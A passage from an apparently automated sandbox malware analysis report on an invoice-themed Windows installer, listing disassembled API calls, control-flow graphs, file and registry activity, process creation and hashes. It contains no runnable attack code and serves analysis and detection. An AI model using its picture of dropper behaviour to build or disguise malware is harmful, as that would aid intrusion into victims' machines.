                                                  • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nskBC9B.tmp\System.dll,00403412,00403412,Skipped: C:\Users\user\AppData\Local\Temp\nskBC9B.tmp\System.dll,00000000,00418EC0,00000000), ref: 00405621
                                                  • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nskBC9B.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nskBC9B.tmp\System.dll), ref: 00405633
                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405659
                                                  • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405673
                                                  • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405681
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                  • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nskBC9B.tmp\System.dll
                                                  • API String ID: 2531174081-3011699776

                                                  Control-flow Graph
                                                  • First basic block: 402711-40272a
                                                  APIs
                                                  • ReadFile.KERNELBASE(?,?,?,?), ref: 0040277D
                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,?), ref: 004027B8
                                                  • SetFilePointer.KERNELBASE(?,?,?,?,?,00000008,?,?,?,?), ref: 004027DB
                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,?,?,?,?,00000008,?,?,?,?), ref: 004027F1
                                                    • Part of subcall function 00406112: SetFilePointer.KERNEL32(?,00000000,00000000,?), ref: 00406128
                                                  • SetFilePointer.KERNEL32(?,?,?,?,?,?,00000002), ref: 0040289D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: File$Pointer$ByteCharMultiWide$Read
                                                  • String ID: 9
                                                  • API String ID: 163830602-2366072709

                                                  Control-flow Graph
                                                  • First basic block: 4032d9-4032f0
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: CountTick$wsprintf
                                                  • String ID: ... %d%%
                                                  • API String ID: 551687249-2449383134

                                                  Control-flow Graph
                                                  • First basic block: 4068c5-4068e5
                                                  APIs
                                                  • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068DC
                                                  • wsprintfW.USER32 ref: 00406917
                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040692B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.84198496076.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198579933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198891896.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: DirectoryLibraryLoadSystemwsprintf
                                                  • String ID: %s%S.dll$UXTHEME
                                                  • API String ID: 2200240437-1106614640
                                                  • Opcode ID: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                                  • Instruction ID: 5a11031caceee5166790be9fdf4905626ac305c011281564bfcfed8699633c36
                                                  • Opcode Fuzzy Hash: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                                  • Instruction Fuzzy Hash: 4FF0FC31501219A6CF10BB68DD0DF9B375C9B00304F10847EA546F10E0EB78D768C798

                                                  Control-flow Graph

                                                  control_flow_graph 991 402ece-402ef7 call 4063ae 993 402efc-402f00 991->993 994 402fb1-402fb5 993->994 995 402f06-402f0a 993->995 996 402f0c-402f2d RegEnumValueW 995->996 997 402f2f-402f42 995->997 996->997 998 402f96-402fa4 RegCloseKey 996->998 999 402f6b-402f72 RegEnumKeyW 997->999 998->994 1000 402f44-402f46 999->1000 1001 402f74-402f86 RegCloseKey call 406935 999->1001 1000->998 1002 402f48-402f5c call 402ece 1000->1002 1006 402fa6-402fac 1001->1006 1007 402f88-402f94 RegDeleteKeyW 1001->1007 1002->1001 1009 402f5e-402f6a 1002->1009 1006->994 1007->994 1009->999
                                                  APIs
                                                  • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F22
                                                  • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F6E
                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F77
                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F8E
                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F99
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: CloseEnum$DeleteValue
                                                  • String ID:
                                                  • API String ID: 1354259210-0
                                                  • Opcode ID: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
                                                  • Instruction ID: d442e96e729bea3163a88d870f4d25619929b9fa7009ff0cba57fd90435ded5e
                                                  • Opcode Fuzzy Hash: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
                                                  • Instruction Fuzzy Hash: 8B212A7150010ABFDF129F94CE89EEF7A7DEB54388F110076B909B21A0D7B58E54AA68

                                                  Control-flow Graph

                                                  control_flow_graph 1010 707e1817-707e1856 call 707e1bff 1014 707e185c-707e1860 1010->1014 1015 707e1976-707e1978 1010->1015 1016 707e1869-707e1876 call 707e2480 1014->1016 1017 707e1862-707e1868 call 707e243e 1014->1017 1022 707e1878-707e187d 1016->1022 1023 707e18a6-707e18ad 1016->1023 1017->1016 1026 707e187f-707e1880 1022->1026 1027 707e1898-707e189b 1022->1027 1024 707e18af-707e18cb call 707e2655 call 707e1654 call 707e1312 GlobalFree 1023->1024 1025 707e18cd-707e18d1 1023->1025 1050 707e1925-707e1929 1024->1050 1028 707e191e-707e1924 call 707e2655 1025->1028 1029 707e18d3-707e191c call 707e1666 call 707e2655 1025->1029 1032 707e1888-707e1889 call 707e2b98 1026->1032 1033 707e1882-707e1883 1026->1033 1027->1023 1030 707e189d-707e189e call 707e2e23 1027->1030 1028->1050 1029->1050 1044 707e18a3 1030->1044 1041 707e188e 1032->1041 1039 707e1885-707e1886 1033->1039 1040 707e1890-707e1896 call 707e2810 1033->1040 1039->1023 1039->1032 1049 707e18a5 1040->1049 1041->1044 1044->1049 1049->1023 1054 707e192b-707e1939 call 707e2618 1050->1054 1055 707e1966-707e196d 1050->1055 1060 707e193b-707e193e 1054->1060 1061 707e1951-707e1958 1054->1061 1055->1015 1057 707e196f-707e1970 GlobalFree 1055->1057 1057->1015 1060->1061 1062 707e1940-707e1948 1060->1062 1061->1055 1063 707e195a-707e1965 call 707e15dd 1061->1063 1062->1061 1064 707e194a-707e194b FreeLibrary 1062->1064 1063->1055 1064->1061
                                                  APIs
                                                    • Part of subcall function 707E1BFF: GlobalFree.KERNEL32(?), ref: 707E1E74
                                                    • Part of subcall function 707E1BFF: GlobalFree.KERNEL32(?), ref: 707E1E79
                                                    • Part of subcall function 707E1BFF: GlobalFree.KERNEL32(?), ref: 707E1E7E
                                                  • GlobalFree.KERNEL32(00000000), ref: 707E18C5
                                                  • FreeLibrary.KERNEL32(?), ref: 707E194B
                                                  • GlobalFree.KERNEL32(00000000), ref: 707E1970
                                                    • Part of subcall function 707E243E: GlobalAlloc.KERNEL32(00000040,?), ref: 707E246F
                                                    • Part of subcall function 707E2810: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,707E1896,00000000), ref: 707E28E0
                                                    • Part of subcall function 707E1666: wsprintfW.USER32 ref: 707E1694
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84226363291.00000000707E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 707E0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_707e0000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: Global$Free$Alloc$Librarywsprintf
                                                  • String ID:
                                                  • API String ID: 3962662361-3916222277
                                                  • Opcode ID: d0be4144c9db670f1a085a2964b7078a74126f0639403d04202610a4c1ac9ecf
                                                  • Instruction ID: d8c4796897c45502fa7531ed802986bc506559f96ae831b1f9d335993d0abfb4
                                                  • Opcode Fuzzy Hash: d0be4144c9db670f1a085a2964b7078a74126f0639403d04202610a4c1ac9ecf
                                                  • Instruction Fuzzy Hash: 6641F272502245DFCB009F36DDCAB8D37BCAF04324F1444E9F90A9B286DBB4A885C760

                                                  Control-flow Graph

                                                  control_flow_graph 1067 4024af-4024d6 call 402dcb * 2 call 402e5b 1073 4024db-4024e0 1067->1073 1074 4024e6-4024f0 1073->1074 1075 402c4f-402c5e 1073->1075 1076 4024f2-4024ff call 402dcb lstrlenW 1074->1076 1077 402503-402506 1074->1077 1076->1077 1081 402508-402519 call 402da9 1077->1081 1082 40251a-40251d 1077->1082 1081->1082 1083 40252e-402542 RegSetValueExW 1082->1083 1084 40251f-402529 call 4032d9 1082->1084 1088 402544 1083->1088 1089 402547-402628 RegCloseKey 1083->1089 1084->1083 1088->1089 1089->1075
                                                  APIs
                                                  • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nskBC9B.tmp,00000023,00000011,00000002), ref: 004024FA
                                                  • RegSetValueExW.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nskBC9B.tmp,00000000,00000011,00000002), ref: 0040253A
                                                  • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nskBC9B.tmp,00000000,00000011,00000002), ref: 00402622
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: CloseValuelstrlen
                                                  • String ID: C:\Users\user\AppData\Local\Temp\nskBC9B.tmp
                                                  • API String ID: 2655323295-3152796830
                                                  • Opcode ID: 37a11c6b0f51b22a2f33a6809eb4fcf72931e05cd9d281b1516a83ef08499fb1
                                                  • Instruction ID: 8b3a83999d63c16b18a9973427bcf430ab7992b94c8fe07ed2dd95b358db5eaa
                                                  • Opcode Fuzzy Hash: 37a11c6b0f51b22a2f33a6809eb4fcf72931e05cd9d281b1516a83ef08499fb1
                                                  • Instruction Fuzzy Hash: 1611B431D00114BEDB00AFA5DE59AAEB6B4EF44318F20443FF400B61D1C7B88E409668
                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 0040607E
                                                  • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040351A,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806), ref: 00406099
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: CountFileNameTempTick
                                                  • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                  • API String ID: 1716503409-944333549
                                                  • Opcode ID: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                                  • Instruction ID: 6ac4114a0c6328616d68196ae331b9967fc339ed7b26ce04d623ba2336a1d7a6
                                                  • Opcode Fuzzy Hash: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                                  • Instruction Fuzzy Hash: D4F09076B40204BBEB00CF69ED05F9FB7ACEB95750F11803AFA01F7180E6B099548768
                                                  APIs
                                                    • Part of subcall function 00405EBB: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nskBC9B.tmp,?,00405F2F,C:\Users\user\AppData\Local\Temp\nskBC9B.tmp,C:\Users\user\AppData\Local\Temp\nskBC9B.tmp,77943420,?,C:\Users\user\AppData\Local\Temp\,00405C6D,?,77943420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe"), ref: 00405EC9
                                                    • Part of subcall function 00405EBB: CharNextW.USER32(00000000), ref: 00405ECE
                                                    • Part of subcall function 00405EBB: CharNextW.USER32(00000000), ref: 00405EE6
                                                  • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040163F
                                                    • Part of subcall function 00405A95: CreateDirectoryW.KERNELBASE(0042C800,?), ref: 00405AD7
                                                  • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\steelmake\bimlet,?,00000000,000000F0), ref: 00401672
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\steelmake\bimlet, xrefs: 00401665
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                  • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\steelmake\bimlet
                                                  • API String ID: 1892508949-719092821
                                                  • Opcode ID: 1cb6e0f2a5ab0800d51524057d62bd681975080efc3acd993a5567cdeed0022e
                                                  • Instruction ID: 707209c2395922376f9f001c82b8f9212c950a3f0646f554414056ec45e3a30b
                                                  • Opcode Fuzzy Hash: 1cb6e0f2a5ab0800d51524057d62bd681975080efc3acd993a5567cdeed0022e
                                                  • Instruction Fuzzy Hash: DC11B231504514EBDF206FA5CD415AF36B0EF14368B25493FE942B22F1D63E4A81DA9D
                                                  APIs
                                                  • RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,00000800,00000000,?,?,?,?,Call,?,00000000,00406680,80000002), ref: 00406455
                                                  • RegCloseKey.ADVAPI32(?), ref: 00406460
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: CloseQueryValue
                                                  • String ID: Call
                                                  • API String ID: 3356406503-1824292864
                                                  • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                  • Instruction ID: ab0cc6cc405738cc07c99bf25685dc2411b0540f073fb059e05756a610da7e73
                                                  • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                  • Instruction Fuzzy Hash: 4F015E72510209AADF218F51CC05EDB3BA8EB54354F01403AFD5992150D738D968DB94
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2ff22e2e2fe9ce3de78e7ddd3335664d820a6fec416f6b591a6c72a947d9530d
                                                  • Instruction ID: 57bf2fd90c69a3a2134d3ca1d9604f9a54cf20ddad3feead76618616929b2f58
                                                  • Opcode Fuzzy Hash: 2ff22e2e2fe9ce3de78e7ddd3335664d820a6fec416f6b591a6c72a947d9530d
                                                  • Instruction Fuzzy Hash: 17A15471E04229CBDF28CFA8C8546ADBBB1FF44305F10846ED816BB281D7786A86DF45
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  APIs
                                                  • GetModuleHandleW.KERNELBASE(00000000,?,000000F0), ref: 00402128
                                                    • Part of subcall function 004055C6: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nskBC9B.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000,?), ref: 004055FE
                                                    • Part of subcall function 004055C6: lstrlenW.KERNEL32(00403412,Skipped: C:\Users\user\AppData\Local\Temp\nskBC9B.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000), ref: 0040560E
                                                    • Part of subcall function 004055C6: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nskBC9B.tmp\System.dll,00403412,00403412,Skipped: C:\Users\user\AppData\Local\Temp\nskBC9B.tmp\System.dll,00000000,00418EC0,00000000), ref: 00405621
                                                    • Part of subcall function 004055C6: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nskBC9B.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nskBC9B.tmp\System.dll), ref: 00405633
                                                    • Part of subcall function 004055C6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405659
                                                    • Part of subcall function 004055C6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405673
                                                    • Part of subcall function 004055C6: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405681
                                                  • LoadLibraryExW.KERNEL32(00000000,?,00000008,?,000000F0), ref: 00402139
                                                  • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,?,000000F0), ref: 004021B6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Similarity
                                                  • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                  • String ID:
                                                  • API String ID: 334405425-0
                                                  APIs
                                                  • GlobalFree.KERNEL32(005B94B8), ref: 00401C30
                                                  • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401C42
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Similarity
                                                  • API ID: Global$AllocFree
                                                  • String ID: Call
                                                  • API String ID: 3394109436-1824292864
                                                  APIs
                                                  • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 00402580
                                                  • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nskBC9B.tmp,00000000,00000011,00000002), ref: 00402622
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Similarity
                                                  • API ID: CloseQueryValue
                                                  • String ID:
                                                  • API String ID: 3356406503-0
                                                  APIs
                                                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                  • SendMessageW.USER32(0040A2D8,00000402,00000000), ref: 004013F4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  APIs
                                                  • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040247B
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00402484
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Similarity
                                                  • API ID: CloseDeleteValue
                                                  • String ID:
                                                  • API String ID: 2831762973-0
                                                  APIs
                                                  • CreateDirectoryW.KERNELBASE(0042C800,?), ref: 00405AD7
                                                  • GetLastError.KERNEL32 ref: 00405AE5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Similarity
                                                  • API ID: CreateDirectoryErrorLast
                                                  • String ID:
                                                  • API String ID: 1375471231-0
                                                  APIs
                                                  • CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F10,?,?,?,0042C800,?), ref: 00405B4D
                                                  • CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405B5A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Similarity
                                                  • API ID: CloseCreateHandleProcess
                                                  • String ID:
                                                  • API String ID: 3712363035-0
                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(?,00000020,?,0040362C,0000000C,?,?,?,?,?,?,?,?), ref: 00406947
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00406962
                                                    • Part of subcall function 004068C5: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068DC
                                                    • Part of subcall function 004068C5: wsprintfW.USER32 ref: 00406917
                                                    • Part of subcall function 004068C5: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040692B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Similarity
                                                  • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                  • String ID:
                                                  • API String ID: 2547128583-0
                                                  APIs
                                                  • GetFileAttributesW.KERNELBASE(00000003,004030E2,C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe,80000000,00000003), ref: 00406035
                                                  • CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00406057
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Similarity
                                                  • API ID: File$AttributesCreate
                                                  • String ID:
                                                  • API String ID: 415043291-0
                                                  APIs
                                                  • CreateDirectoryW.KERNELBASE(?,00000000,0040350F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00405AF5
                                                  • GetLastError.KERNEL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405B03
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Similarity
                                                  • API ID: CreateDirectoryErrorLast
                                                  • String ID:
                                                  • API String ID: 1375471231-0
                                                  APIs
                                                  • ReadFile.KERNELBASE(00000000), ref: 707E2C57
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84226363291.00000000707E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 707E0000, based on PE: true
                                                  Similarity
                                                  • API ID: FileRead
                                                  • String ID:
                                                  • API String ID: 2738559852-0
                                                  APIs
                                                  • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 004028D4
                                                    • Part of subcall function 00406488: wsprintfW.USER32 ref: 00406495
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Similarity
                                                  • API ID: FilePointerwsprintf
                                                  • String ID:
                                                  • API String ID: 327478801-0
                                                  APIs
                                                  • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402E7C,00000000,?,?), ref: 00406405
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0
                                                  APIs
                                                  • WriteFile.KERNELBASE(00000000,00000000,?,?,00000000,?,?,0040349F,00000000,00414EC0,?,00414EC0,?,000000FF,?,00000000), ref: 004060F7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Similarity
                                                  • API ID: FileWrite
                                                  • String ID:
                                                  • API String ID: 3934441357-0
                                                  APIs
                                                  • ReadFile.KERNELBASE(00000000,00000000,?,?,00000000,000000FF,?,004034D1,00000000,00000000,00403328,000000FF,?,00000000,00000000,00000000), ref: 004060C8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Similarity
                                                  • API ID: FileRead
                                                  • String ID:
                                                  • API String ID: 2738559852-0
                                                  APIs
                                                  • VirtualProtect.KERNELBASE(707E505C,?,00000040,707E504C), ref: 707E2A9D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84226363291.00000000707E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 707E0000, based on PE: true
                                                  • Associated: 00000000.00000002.84226292605.00000000707E0000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000000.00000002.84226422708.00000000707E4000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000000.00000002.84226496862.00000000707E6000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_707e0000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: ProtectVirtual
                                                  • String ID:
                                                  • API String ID: 544645111-0
                                                  APIs
                                                  • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 0040244A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: PrivateProfileString
                                                  • String ID:
                                                  • API String ID: 1096422788-0
                                                  APIs
                                                  • RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000000,?,0040643C,?,?,?,?,Call,?,00000000), ref: 004063D2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: Open
                                                  • String ID:
                                                  • API String ID: 71445658-0
                                                  APIs
                                                  • SendMessageW.USER32(00010430,00000000,00000000,00000000), ref: 0040451E
                                                  Memory Dump Source
